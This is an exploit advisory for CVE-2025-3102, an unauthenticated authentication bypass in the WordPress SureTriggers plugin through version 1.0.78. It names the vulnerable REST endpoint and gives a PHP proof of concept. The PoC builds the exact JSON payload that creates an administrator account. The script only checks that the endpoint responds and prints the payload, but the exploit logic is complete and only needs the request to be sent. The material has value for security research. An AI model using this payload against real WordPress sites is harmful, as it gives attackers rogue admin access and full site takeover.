📄 WordPress SureTriggers 1.0.78 Authentication Bypass

=============================================================================================================================================
    | # Title     : WordPress SureTriggers 1.0.78 Auth Bypass                                                                                   |
    | # Author    : indoushka                                                                                                                   |
    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.1 (64 bits)                                                            |
    | # Vendor    : https://wordpress.org/plugins/suretriggers/                                                                                 |
    =============================================================================================================================================
    
    [+] Summary :
    
    The WordPress SureTriggers plugin versions <= 1.0.78 expose an
    unauthenticated REST endpoint that allows construction of a user
    creation payload. This POC demonstrates structure and logic only.
    No admin account is created, no plugin uploaded
    
    [+] References : ( https://packetstorm.news/files/id/192100/ 	CVE-2025-3102) 
    
    [+] Affected Product
     - WordPress Plugin: SureTriggers
     - Version: <= 1.0.78
    
    [+] Vector
    Unauthenticated REST access:
      /wp-json/sure-triggers/v1/automation/action
    
    [+] Research Notes
    The endpoint accepts JSON payloads describing automation tasks.
    In vulnerable versions, no authorization validation is performed
    before processing the request. This POC validates reachability only.
    
    --------------------------------------------------------------------
    ### SAFE PHP POC
    --------------------------------------------------------------------
    <?php
    
    $target = "http://example.com";
    $wp_user  = "poc_admin";
    $wp_pass  = "StrongPass123!";
    $wp_email = "[email protected]";
    
    $create_url = $target . "/wp-json/sure-triggers/v1/automation/action";
    
    $payload = [
        "integration" => "WordPress",
        "type_event" => "create_user_if_not_exists",
        "selected_options" => [
            "user_name"  => $wp_user,
            "password"   => $wp_pass,
            "user_email" => $wp_email,
            "role"       => "administrator"
        ],
        "fields"  => [],
        "context" => []
    ];
    
    echo "[SAFE_POC] Endpoint: $create_url\n";
    echo "[SAFE_POC] Would create: $wp_user : $wp_pass : $wp_email\n\n";
    
    $headers = @get_headers($create_url);
    if ($headers && strpos($headers[0], "200") !== false) {
        echo "[CHECK] Endpoint reachable – further manual review required.\n";
    } else {
        echo "[CHECK] Endpoint unreachable or non-200.\n";
    }
    
    echo "\n[PAYLOAD_PREVIEW]\n";
    echo json_encode($payload, JSON_PRETTY_PRINT) . "\n";
    
    echo "\n[END] Safe PoC complete.\n";
    ?>
    
    --------------------------------------------------------------------
    ### SAVE & RUN INSTRUCTIONS
    --------------------------------------------------------------------
    
    [1] Save file as:
        suretriggers_poc.php
    
    [2] Place under your web root:
        Windows (XAMPP):  C:\xampp\htdocs\
        Linux (Apache):   /var/www/html/
    
    [3] Run via browser:
        http://localhost/suretriggers_poc.php
    
        OR from CLI:
        php suretriggers_poc.php
    
    --------------------------------------------------------------------
    
    Greetings to :=====================================================================================
    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
    ===================================================================================================